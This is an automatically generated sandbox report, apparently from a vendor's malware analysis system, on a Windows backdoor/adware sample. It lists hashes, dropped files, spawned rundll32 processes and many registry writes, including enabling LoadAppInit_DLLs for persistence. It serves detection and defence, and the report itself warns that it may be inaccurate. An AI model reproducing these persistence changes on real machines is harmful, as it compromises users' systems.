Gen.Variant.Adware.Kazy.554588_ef6a1ae35b
not-a-virus:HEUR:AdWare.Win32.Generic (Kaspersky), Gen:Variant.Adware.Kazy.554588 (B) (Emsisoft), Gen:Variant.Adware.Kazy.554588 (AdAware), Backdoor.Win32.PcClient.FD (Lavasoft MAS)
Behaviour: Backdoor, Adware
This description has been automatically generated by Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.
MD5: ef6a1ae35ba68aaa997970227aec7646
SHA1: f40039906054085a6eb9b435b9e11857fe34a5cf
SHA256: f950cdd9b924d8356e25c5fb258b9156267d9ff0a372ad7db2dc6cd0ec232675
SSDeep: 49152:5uD50 jdzURmF63IonK3ef6RlPCkWLz6XHXWRHG7t00FU62fWLtw1i2tRf :5K jdzUmF64Q6RlPCrAGRAtpGEw1i2D
Size: 2536960 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-01-27 11:51:38
Analyzed on: WindowsXP SP3 32-bit
Summary:
Backdoor. Malware that enables remote control of the victim's machine.
Payload
No specific payload has been found.
Process activity
The Backdoor creates the following process(es):
%original file name%.exe:1140
rundll32.exe:1764
rundll32.exe:1116
The Backdoor injects its code into the following process(es):
No processes have been created.
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:1140 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Program Files%\TrimInstance\TrimInstance.dll (86905 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (7972 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (0 bytes)
Registry activity
The process %original file name%.exe:1140 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"fe94ce1e" = "V/////%%"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"c6c5dd44" = "V/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"bbf88800" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"usr.0" = "LwAzvySUMOQIKEG xz"
"usr.1" = "PJiVPRFHwysurpnikg"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"e46c271e" = "///%"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995]
"date" = "1431203279"
"LRTS" = "0"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"Mode" = "4026531840"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"72758a5d" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_b0250ce0\eae10f9d]
"dbaf3ce3" = "/P////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"7367429f" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\00000000]
"370856c7" = ""
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"LRTS" = "0"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"a0743acc" = "N/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"8b9e4cbc" = "V/////%%"
"72758a5d" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"1520c6f1" = "V/////%%"
"2e22d94e" = "///%"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"svpath" = "c:\Program Files\TrimInstance\TrimInstance.dll"
[HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}]
"n" = "1"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"c99a5f5c" = "///%"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 28 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"340d3099" = "/P////%%"
[HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}]
"n" = "1"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"
"7f69fa1f" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs" = "1"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"fe94ce1e" = "V/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"iiid" = "1"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995]
"usr.1" = "PJiVPRFHwysurpnikg"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"2d71d5ab" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{bca22949}]
"InstallDate" = "20140118"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"data.1" = "S28upk9U/ZkthtvqomdKaWtIuKFCQSQET9eNel9Ce1rl0i3sud2ScYgde35kEwtNSvJc8ZsOMO9gK6RJH1Fc4ge6Cj5U"
"data.0" = "Xa0RL6a5aR76/WG xzI IsMC2TiyhIA0hiHq0mxF0j/VZU2ROBlA6JIfRxdUkflc 4n/oO5wy"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"340d3099" = "///%"
"dbaf3ce3" = "/P////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"48bd1aff" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"c6c5dd44" = "V/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\00000000]
"3efeb33e" = ""
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"414bc593" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"38583bc3" = "Ml/2/CF/M//g/CZ////%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"340d3099" = "/P////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"0e93c3f3" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"uuid" = "16675769074180770034"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995]
"iiid" = "1"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"27ddcf6f" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{bca22949}]
"NoModify" = "1"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"27ddcf6f" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"c99a5f5c" = "///%"
"f6ad6fa6" = "V/////%%"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"date" = "1431203279"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995]
"svi" = "0"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"48bd1aff" = "V/////%%"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"2e22d94e" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995]
"svn" = "TrimInstance"
"data.1" = "S28upk9U/ZkthtvqomdKaWtIuKFCQSQET9eNel9Ce1rl0i3sud2ScYgde35kEwtNSvJc8ZsOMO9gK6RJH1Fc4ge6Cj5U"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"fe94ce1e" = "V/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"587b5709" = "V/////%%"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995]
"svx" = ""
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"
"2d71d5ab" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{bca22949}]
"UninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\TRIMIN~1\TRIMIN~1.DLL,_uninstall /un"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995]
"svt" = "1431210485"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"
"f2c53c49" = "UlAr/XJ/c//k////"
"2d71d5ab" = "V/////%%"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"7367429f" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"65114b36" = "VP/l////"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{bca22949}]
"CategoryName" = ""
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"51d2f2ea" = "K/Af/Xt/aPAS/X2/blAh/XD/axAs/XJ////%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\00000000]
"370856c7" = ""
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"c5705860" = "Vx////%%"
"0dc3ee96" = "/P////%%"
"6185d035" = "Vx/2/Cx/V//l////"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"3c09c42b" = "///%"
"48bd1aff" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "93 8B E7 DD C8 C2 0B 5F 90 19 AF B0 E0 0C EB BB"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"Install_Dir" = "%Program Files%\TrimInstance"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"f0bf0bde" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"iiid" = "1"
"State" = "0"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"d1abcdb6" = "///%"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995]
"State" = "0"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"d1abcdb6" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"0c230bcb" = "///%"
"f2c53c49" = "UlAr/XJ/c//k////"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"e46c271e" = "///%"
"a2e3b941" = "///%"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995]
"Version" = "22022131"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"LRTS" = "0"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"27ddcf6f" = "///%"
"7f69fa1f" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"a0743acc" = "N/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"8b9e4cbc" = "V/////%%"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"51d2f2ea" = "K/Af/Xt/aPAS/X2/blAh/XD/axAs/XJ////%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"usr.1" = "PJiVPRFHwysurpnikg"
"usr.0" = "LwAzvySUMOQIKEG xz"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"a2e3b941" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"e46c271e" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"6185d035" = "Vx/2/Cx/V//l////"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"
"a0743acc" = "N/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"a1dcff5b" = "V/////%%"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\00000000]
"3efeb33e" = ""
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"7367429f" = "///%"
"0c230bcb" = "///%"
"3c09c42b" = "///%"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995]
"uuid" = "16675769074180770034"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"51d2f2ea" = "K/Af/Xt/aPAS/X2/blAh/XD/axAs/XJ////%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"Mode" = "4026531840"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"bbf88800" = "///%"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}]
"bca22949" = "%Program Files%\TrimInstance\TrimInstance.dll"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{bca22949}]
"NoRepair" = "1"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"dlpath" = "c:\progra~1\trimin~1\trimin~1.dll"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995]
"Mode" = "4026531840"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"uuid" = "16675769074180770034"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"f6ad6fa6" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{bca22949}]
"Publisher" = "Software Publisher"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"6185d035" = "Vx/2/Cx/V//l////"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\00000000]
"370856c7" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"0dc3ee96" = "/P////%%"
"f0bf0bde" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"data.0" = "Xa0RL6a5aR76/WG xzI IsMC2TiyhIA0hiHq0mxF0j/VZU2ROBlA6JIfRxdUkflc 4n/oO5wy"
"data.1" = "S28upk9U/ZkthtvqomdKaWtIuKFCQSQET9eNel9Ce1rl0i3sud2ScYgde35kEwtNSvJc8ZsOMO9gK6RJH1Fc4ge6Cj5U"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"414bc593" = "///%"
"c5705860" = "Vx////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"bbf88800" = "///%"
"38583bc3" = "Ml/2/CF/M//g/CZ////%"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{bca22949}]
"Cache" = "9428760297565573948"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"414bc593" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_b0250ce0\eae10f9d]
"340d3099" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"svi" = "0"
"svn" = "TrimInstance"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\00000000]
"3efeb33e" = ""
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"f6ad6fa6" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"c5705860" = "Vx////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"svx" = ""
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"
"a1dcff5b" = "V/////%%"
"38583bc3" = "Ml/2/CF/M//g/CZ////%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"svt" = "1431210485"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
